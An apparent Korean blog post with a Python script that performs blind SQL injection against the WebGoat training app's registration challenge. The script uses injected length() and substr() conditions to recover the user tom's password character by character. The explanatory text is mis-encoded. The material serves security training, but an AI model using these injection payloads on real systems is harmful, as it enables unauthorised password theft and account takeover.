import requests
password = str()
cre = "created"
url = "http://localhost:8080/WebGoat/SqlInjection/challenge"
cookie = {'JSESSIONID':'8B10E84050C998DD12174E500DBA38F6'}
print ('[*] Get password length...')
password_length = int()
for length in range(1,30):
datas = {'username_reg' : "tom' and length(password) = %d and '1'='1" % length, 'email_reg' : 'test@test.com', 'password_reg' : '1111', 'confirm_password_reg' : '1111'}
r = requests.put(url,datas,cookies=cookie)
password_length+=1
if 'created' in r.content.decode():
print(password_length)
continue
if 'exists' in r.content.decode():
break
if "Internal Server Error" in r.content.decode():
print("SQL ERROR")
print(r.text)
break
print ('[!] Done!!!')
print ("[*] Length of password id %d" % password_length)
print ('[*] Hack the password')
for i in range(1, password_length +1 ):
for c in range(0x61,0x7b):
payload = "tom' and substr(password, %d, 1) = '%c' and '1'='1" % (i, c)
data = {'username_reg': payload, 'email_reg' : 'test@test.com', 'password_reg' : '1111', 'confirm_password_reg' : '1111'}
r = requests.put(url,data,cookies=cookie)
print(r.content.decode())
print(password)
if 'created' in r.content.decode():
continue
if 'different' in r.content.decode():
password += chr(c)
break
if 'Internal Server Error' in r.content.decode():
continue
print ("[*] Tom's pw : %s" % password)
request ํจํท์ challenge์ ํ๋ผ๋ฏธํฐ๋ฅผ ๋ณด๋ธ๋ค. ID ๋ถ๋ถ์ blind sql injection์ผ๋ก ๋น๋ฐ๋ฒํธ ๊ธธ์ด๋ฅผ ์์๋ธ๋ค. response ํจํท์ผ๋ก ๋ณธ๋ฌธ ๋ด์ฉ์ค์ created ๋๋ exists ๊ฐ ํฌํจ๋์ด ์์๊ฒฝ์ฐ ๋ค์ ๋ก์ง์ ์ฒ๋ฆฌํ๋ค. ๊ธธ์ด๋ฅผ ์์๋ธํ Brute Force๋ฅผ ์ํํ๋ค. a~zA~z ๋ฌธ์์ ๋ฒ์๋ก ๋น๋ฐ๋ฒํธ๋ฅผ ํ์ํ๋ค. ๋ฌธ์ ๋น๊ต sql ์ ๋ง๋ค์ด blind injection์ ์ํํ๋ค. response์ ํจํท ๋ด์ฉ์ ํตํด ์๋ต์ ํ๋จํ๊ณ ๋น๋ฐ๋ฒํธ๋ฅผ ์ฐพ์๋ด๊ฒ ๋๋ค.
'๐ค์ ๋ณด๋ณด์ > โค๏ธ๋ ๋ํ' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
[์ ๋ณด] ํด์ (0) | 2023.06.27 |
---|---|
[์ ๋ณด] http ๊ณต๊ฒฉ ์คํฌ (0) | 2023.06.27 |
[์ ๋ณด] DLL Injection ํ์ด์ฌ ์ฝ๋ (0) | 2023.03.15 |
[ํ์ด์ฌ] ๊ถํ ์์น ๋ช ๋ น์ด(๊ฐ๋จ ์ต์ข ) (0) | 2022.07.01 |
[ํ์ด์ฌ] ๊ถํ ์์น ์์ฒญ ์ฝ๋(2022 ์ต์ ) (0) | 2022.07.01 |